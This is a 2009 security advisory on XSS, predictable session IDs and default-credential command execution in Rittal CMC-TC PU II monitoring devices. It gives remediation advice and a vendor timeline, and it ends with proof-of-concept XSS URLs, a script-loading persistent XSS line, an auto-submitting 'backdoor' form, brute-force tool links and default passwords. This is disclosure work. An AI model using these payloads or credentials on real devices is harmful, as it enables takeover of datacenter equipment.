Rittal CMC-TC Processing Unit II XSS / Command Execution

` Louhi Networks Oy  
-= Security Advisory =-  
  
  
Advisory: Rittal CMC-TC Processing Unit II  
multiple vulnerabilities  
Release Date: 2009-03-23  
Last Modified: 2009-03-22  
Authors: Henri Lindberg, CISA  
[henri d0t lindberg at louhi d0t fi]  
  
Application: Rittal CMC-TC PU II Web management  
  
Devices: CMC-TC PU II DK 7320.100 SW: V2.45 HW: V3.01,  
possibly other Rittal products  
  
Attack type : XSS Type I, XSS Type II, Session prediction,  
Remote command execution in default configuration  
Severity: Moderate  
Vendor Status: Vendor notified.  
Patch already available for XSS vulnerabilities.  
Other vulnerabilities will be addressed in a future  
version, no release date set.  
References: http://www.louhinetworks.fi/advisory/Rittal_090323.txt  
  
  
Overview:  
Quote from http://www.rimatrix5.com/ :  
"The Computer Multi Control Top-Concept (CMC-TC) from Rittal is  
a complete security management for preventive protection to guard  
against consequential costs, and is the central organisational unit  
for linking to the facility management.  
...  
Processing Unit II (PU II) the nerve centre of the CMC-TC monitoring  
system. The PU II is the coordinator between the sensor unit and the  
network. It is configured via the integral Web server."  
  
Details:  
  
Several vulnerabilities were identified from CMC-TC PU II web  
interface. These include XSS Type I, XSS Type II, weak session  
management and insecure default configuration.  
  
XSS Type 1:  
-----------  
Web application fails to validate and/or htmlencode user input when  
handling erroneous requests. This allows attacker to inject HTML and  
client-side scripts to victim's browser by creating suitable links.  
  
This vulnerability cannot be used for session hijacking, because  
CMC-TC PU II requires each valid request to contain current session  
ID as URL parameter. Requests without session ID are redirected to  
the login page. Therefore only phishing-type attacks or attacks  
against user's browser are possible.  
  
Successful exploitation requires that attacker can lure or force  
the user to follow the malicious link.  
  
XSS Type 2:  
-----------  
Web application fails to sanitize and/or htmlencode user input on  
system information page. This allows attacker to backdoor the device  
with HTML and browser interpreted content (such as ECMAscript  
dialects or other client-side scripts) as the content is displayed  
always after login. Persistent XSS allows attacker to modify  
displayed content or to change the victim's password (since old  
password is not required for password changes).  
  
Succesful exploitation requires access to the web management  
interface either with valid credentials or hijacked session.  
  
Weak session management:  
------------------------  
CMC-TC PU II uses unixtime from login moment as session identifier,  
thus having insufficient randomization.  
  
If administrator login time is known and session is still valid, it  
can be brute-forced with relatively little effort. Proof-of-concept  
tool is provided, but any web application security tool (such as  
Burp Intruder) can be used for this.  
  
Successful exploitation requires that administrator login time is  
known (or a reasonably accurate guess can be made) and the session  
is still active.  
  
Insecure default configuration:  
-------------------------------  
If default administrator password is not changed, attacker can run  
arbitrary commands and modify the system software by uploading  
malicious update scripts via ftp. See update packet script contents  
for detailed information about the update process (eg update_l.sh).  
  
Software update packet expects user to have default password  
in place, since ftp-upload script contains hardcoded default  
password. The update will fail with no errors if it's been changed.  
  
What makes this interesting is the fact that the device does not  
offer operating system level access through any of the other  
management interfaces. Telnet and SSH both offer a menu based  
administration interface.  
  
Successful exploitation requires default administrator password and  
access to ftp port of the target device.  
  
Remediation:  
* Restrict unauthorized network access to device  
* Change default passwords (instructions provided in Operation  
Manual)  
* Install patched Version 2.60a  
* Update future patch version as soon as available  
* Configure web interface to 'view only'  
* Review device configuration after an administrator has been let go  
* Do not follow untrusted links  
  
Timeline:  
* 2008-xx-xx Issues discovered  
  
* 2009-02-25 Contacted vendor via e-mail  
  
* 2009-03-02 Contacted vendor via e-mail  
  
* 2009-03-02 Vendor response.  
XSS vulnerabilities were already fixed independently.  
  
  
http://www.rittal.de/downloads/Software/de/CMC_TC/18_update_processing_unit2/PU2_Update_v2.60a.zip  
  
http://www.rittal.de/downloads/Software/en/CMC_TC/12_CMC_TC_Processing_unit/7320100V33e.pdf  
  
Quote from vendor (sic):  
  
"thank you very much by the security information XXS.  
We have seen, your customer has check the PUII SW V2.45.  
Actual we have a better Version 2.60a with more seyurity.  
Our XXS-Check of that Version is OK.  
If you has by the basic more information for Rittal,  
we are fine to get . "  
  
* 2009-03-02 Contacted vendor via e-mail requesting information about  
weak session management and public disclosure of XSS  
vulnerabilities.  
  
* 2009-03-02 Discovered issues regarding default configuration from  
update packages  
  
* 2009-03-16 Contacted vendor via e-mail requesting information  
regarding vulnerabilities and stating intent to release  
the advisory  
  
* 2009-03-19 Vendor response. Promises to patch vulnerabilities in a  
future version.  
  
* 2009-03-19 Contacted vendor via e-mail requesting release date for  
the update.  
  
* 2009-03-20 Vendor response. Release date not set.  
  
* 2009-03-20 Contacted vendor via e-mail stating intent to release  
the advisory. Delivered draft version of advisory.  
  
  
Proof-of-Concept:  
  
0) XSS Type 1 / Reflected  
  
http://cmc.example.com/cmclogin.cgi?Fredo=%3Cscript%3Ealert('You%20broke%20my%20heart.You%20broke%20my%20heart');%3C/script%3E  
  
http://cmc.example.com/cmcget.cgi?46010%3CSCRIPT%3Ealert('I%20know%20it%20was%20you.');%3C/SCRIPT%3E  
  
  
1) XSS Type 2 / Persistent  
Setup - General - Location: <script src="http://l7.fi"></script>  
  
1234567890 is the unixtime for administrator's login.  
  
<html>  
<head><title>42</title></head>  
<body onload="document.backdoor.submit()">  
<form ACTION=http://1.1.1.1/cmcget.cgi?630101011234567890 METHOD=POST  
name="backdoor">  
<input name="p001" value="Initech Datacenter CMC-TC PU #42">  
<input name="p002" value="Compton, LA county">  
<input name="p003" value="[email protected]">  
<input name="p004" value="0">  
<input name="p005" value="0">  
<input name="p005" value="1">  
<input name="p006" value="0">  
<input name="p006" value="1">  
<input name="p007" value="1">  
<input name="p008" value="04.02.2000">  
<input name="p009" value="04:20:00">  
</form>  
</body>  
</html>  
  
2) Session prediction  
  
Proof-of-concept brute force tool available at  
http://www.louhinetworks.fi/advisory/Louhi_CMC-brute_090323.zip  
http://milw0rm.com/sploits/2009-Louhi_CMC-brute_090323.zip  
  
  
Other information:  
* Default username and password is cmc  
* Default administrator username/password is admin  
* Device supports following protocols TCP/IP, SNMPv1, SNMPv3, FTP,  
SFTP, SMTP, HTTPS, NTP, SSH, PPP, DHCP. Further research is  
highly encouraged.  
  
  
"Six pints of bitter. And quickly please, the world's about to end."  
-- Ford Prefect  
  
Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,  
no liabilities, information provided 'as is' for educational purposes.  
Reproduction allowed as long as credit is given. Information wants to  
be free.  
  
  
`